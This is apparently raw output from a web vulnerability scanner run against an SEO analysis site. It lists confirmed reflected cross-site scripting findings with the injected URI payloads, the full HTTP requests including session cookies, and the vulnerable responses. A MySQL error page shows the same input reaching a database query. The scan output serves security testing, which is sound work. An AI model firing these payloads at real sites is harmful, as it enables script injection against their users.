== "none" ? "" : "none")'><b>Warning</b> (512)</a>: <span style = "color:Red;text-align:left"><b>SQL Error:</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' and report_date LIKE '2011-05-01%' LIMIT ' at line 1</span> [<b>CORE/cake/libs/model/datasources/dbo_source.php</b>, line <b>526</b>]</pre><div id="CakeStackTrace2" class="cake-stack-trace" style="display: none;"><a href='javascript:void(0);' onclick='document.getElementById("CakeErrorCode2").style.display = (document.getElementById("CakeErrorCode2").style.display == "none" ? "" : "none")'>Code</a> | <a href='javascript:void(0);' onclick='document.getElementById("CakeErrorContext2").style.display = (document.getElementById("CakeErrorContext2").style.display == "none" ? "" : "none")'>Context</a><pre id="CakeErrorContext2" class="cake-context" style="display: none;">$sql = "SELECT `Webanalytic`.`id`, `Webanalytic`.`id_user`, `Webanalytic`.`site_url`, `Webanalytic`.`keywords`, `Webanalytic`.`report_date`, `Webanalytic`.`ip_connection`, `Webanalytic`.`version`, `Webanalytic`.`html`, `Webanalytic`.`content_type`, `Webanalytic`.`http_code`, `Webanalytic`.`http_error_num`, `Webanalytic`.`http_error_msg` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id = '><script>netsparker(9)< and site_url LIKE 'script>' and report_date LIKE '2011-05-01%' LIMIT 1"$error = "1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'script>' and report_date LIKE '2011-05-01%' LIMIT ' at line 1"$out = null</pre><div id="CakeErrorCode2" class="cake-code-dump" style="display: none;"><pre><code><span style="color: #000000">            $out = null;
</span></code><code><span style="color: #000000">            if ($error) {
</span></code><span class="code-highlight"><code><span style="color: #000000">                trigger_error("<span style = \"color:Red;text-align:left\"><b>SQL Error:</b> {$this->error}</span>", E_USER_WARNING);
</span></code></span></pre></div><pre>DboSource::showQuery() - CORE/cake/libs/model/datasources/dbo_source.php, line 526DboSource::execute() - CORE/cake/libs/model/datasources/dbo_source.php, line 202DboSource::fetchAll() - CORE/cake/libs/model/datasources/dbo_source.php, line 337DboSource::read() - CORE/cake/libs/model/datasources/dbo_source.php, line 654Model::find() - CORE/cake/libs/model/model.php, line 2037WebanalyticsController::view() - APP/controllers/webanalytics_controller.php, line 143Object::dispatchMethod() - CORE/cake/libs/object.php, line 125Dispatcher::_invoke() - CORE/cake/dispatcher.php, line 226Dispatcher::dispatch() - CORE/cake/dispatcher.php, line 193[main] - APP/webroot/index.php, line 88</pre></div><pre><p style = "text-align:left"><b>Query:</b> SELECT `Webanalytic`.`id`, `Webanalytic`.`id_user`, `Webanalytic`.`site_url`, `Webanalytic`.`keywords`, `Webanalytic`.`report_date`, `Webanalytic`.`ip_connection`, `Webanalytic`.`version`, `Webanalytic`.`html`, `Webanalytic`.`content_type`, `Webanalytic`.`http_code`, `Webanalytic`.`http_error_num`, `Webanalytic`.`http_error_msg` FROM `seoq_webanalytics` AS `Webanalytic` WHERE id = '><script>netsparker(9)< and site_url LIKE 'script>' and report_date LIKE '2011-05-01%' LIMIT 1 </p></pre><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/'><script>netsparker(9)</script>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="shar..

- /quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/1798/members.multimania.co.uk/zicacan
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=utgikqr0rjtn0dnlkgmg8bu0a3
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:14:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:14:59 GMT; path=/quotient
Keep-Alive: timeout=15, max=2
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F1798%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F1798%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/04/22/1798/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/2272/members.multimania.co.uk/jedawani
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:27 GMT; path=/quotient
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new 